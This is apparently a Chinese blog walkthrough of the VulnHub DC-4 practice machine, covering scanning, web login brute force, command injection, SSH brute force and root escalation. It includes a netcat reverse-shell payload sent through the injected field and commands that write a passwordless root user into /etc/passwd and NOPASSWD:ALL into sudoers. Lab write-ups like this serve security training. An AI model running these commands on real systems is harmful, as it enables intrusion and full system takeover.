Vulnhub靶机 DC-4打靶 渗透详细过程

2024-04-27 888 0

VulnHub靶机 DC-4 打靶实战 渗透测试详细过程

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-4.zip

Vulnhub靶机 DC-4打靶 渗透详细过程插图

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

Vulnhub靶机 DC-4打靶 渗透详细过程插图1

端口扫描

nmap -p- 192.168.43.27

Vulnhub靶机 DC-4打靶 渗透详细过程插图2

开放了22端口和80端口,可以再扫一下服务

nmap -p80,22 -sV -A 192.168.43.27

Vulnhub靶机 DC-4打靶 渗透详细过程插图3

识别一下web服务,看有什么信息

whatweb http://192.168.43.27

Vulnhub靶机 DC-4打靶 渗透详细过程插图4

并没有什么有价值的东西可利用,接下来访问Web界面

Web渗透

暴力破解

来到web界面,发现为登录界面,根据页面提示为管理员登录,但是通过简单信息收集并没有什么有效的信息,那么直接进行弱口令暴力破解

Vulnhub靶机 DC-4打靶 渗透详细过程插图5

Vulnhub靶机 DC-4打靶 渗透详细过程插图6

输入用户名admin,密码随意,抓取登录数据包,进行暴力破解

Vulnhub靶机 DC-4打靶 渗透详细过程插图7

发送请求,等待即可,根据响应大小判断得到结果,密码为happy

Vulnhub靶机 DC-4打靶 渗透详细过程插图8

命令执行

回到后台,等登录即可,进入后台,发现有命令工具,进入查看,点击run,发现执行了ls -l命令得回显内容,抓包看一下

Vulnhub靶机 DC-4打靶 渗透详细过程插图9

Vulnhub靶机 DC-4打靶 渗透详细过程插图10

Vulnhub靶机 DC-4打靶 渗透详细过程插图11

尝试将命令换成其他命令,如whoami,观察是否回显,直接可反弹shell

成功回显,接下来进行反弹shell操作,通过nc反弹

反弹shell

Vulnhub靶机 DC-4打靶 渗透详细过程插图12

radio=nc+-e+/bin/bash+192.168.43.105+8888&submit=%E8%B7%91

Vulnhub靶机 DC-4打靶 渗透详细过程插图13

kail端开启nc监听,成功接收到shell

Vulnhub靶机 DC-4打靶 渗透详细过程插图14

获取一个稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

Vulnhub靶机 DC-4打靶 渗透详细过程插图15

观察当前目录下没有什么可用可看的文件,回答家目录查看一下,有无可用的信息

ssh暴力破解

到/home目录下发现有三个用户的家目录,那么我们依次进入,发现只有jim的家目录不为空,其他两个家目录都为空

Vulnhub靶机 DC-4打靶 渗透详细过程插图16

/home/jim目录下有三个文件,分别查看一下

Vulnhub靶机 DC-4打靶 渗透详细过程插图17

Vulnhub靶机 DC-4打靶 渗透详细过程插图18

通过test.sh脚本的提示信息,再加上查看发现的backups目录当中有密码信息,通过我们得到的三个用户名信息,再加上这个密码信息,可以尝试ssh爆破登录,观察是否可成功爆破出ssh用户的登录密码

先将获取的用户名和密码分别保存到文本文件当中,接下来进行爆破

hydra -L user.txt -P passwd.txt ssh://192.168.43.27

Vulnhub靶机 DC-4打靶 渗透详细过程插图19

通过ssh爆破,成功爆破出jim的ssh登录密码,接下来我们以用户名jim远程登录到靶机当中,进行下一步的操作

Vulnhub靶机 DC-4打靶 渗透详细过程插图20

远程登录

Vulnhub靶机 DC-4打靶 渗透详细过程插图21

查找一下目录,看有无重要信息

通过仔细观察我们发现有一个邮件,我们查看一下

Vulnhub靶机 DC-4打靶 渗透详细过程插图22

Vulnhub靶机 DC-4打靶 渗透详细过程插图23

去往此目录,查看jim文件得内容信息,发现charles发来的邮件,并有连接密码

Vulnhub靶机 DC-4打靶 渗透详细过程插图24

得到charles的ssh远程登录密码,进行远程登录操作

Vulnhub靶机 DC-4打靶 渗透详细过程插图25

然后我们再次通过charles用户进行远程登录,成功登录,发现也有邮件,查看一下,并无有用的信息

Vulnhub靶机 DC-4打靶 渗透详细过程插图26

Vulnhub靶机 DC-4打靶 渗透详细过程插图27

提权

接下来进行提权,提权三步走

//查找suid权限的有无可利用
find / -perm -u=s -type f 2>/dev/null

Vulnhub靶机 DC-4打靶 渗透详细过程插图28

Vulnhub靶机 DC-4打靶 渗透详细过程插图29

su和sudo可利用一下,但是均没成功

Vulnhub靶机 DC-4打靶 渗透详细过程插图30

Vulnhub靶机 DC-4打靶 渗透详细过程插图31

//列出目前用户可执行与无法执行的指令;
sudo -l 查看

Vulnhub靶机 DC-4打靶 渗透详细过程插图32

发现在charles当中的sudo -l命令当中存在以root权限执行的命令

Vulnhub靶机 DC-4打靶 渗透详细过程插图33

查看此命令帮助,如何使用

teehee --help

Vulnhub靶机 DC-4打靶 渗透详细过程插图34

翻译:我们使用-a参数

Vulnhub靶机 DC-4打靶 渗透详细过程插图35

那么接下来我们可以直接向/etc/passwd 文件当中写入,查看一下/etc/passwd文件信息

Vulnhub靶机 DC-4打靶 渗透详细过程插图36

//空密码,直接追加到/etc/passwd
echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd

或 修改charles权限,给予"为所欲为"权限
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"

Vulnhub靶机 DC-4打靶 渗透详细过程插图37

Vulnhub靶机 DC-4打靶 渗透详细过程插图38

直接切换admin用户,发现charles无法切换,换jim用户切换成功,成功提权

su - admin

Vulnhub靶机 DC-4打靶 渗透详细过程插图39

jim用户切换成功:

成功提权,通关

Vulnhub靶机 DC-4打靶 渗透详细过程插图40

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论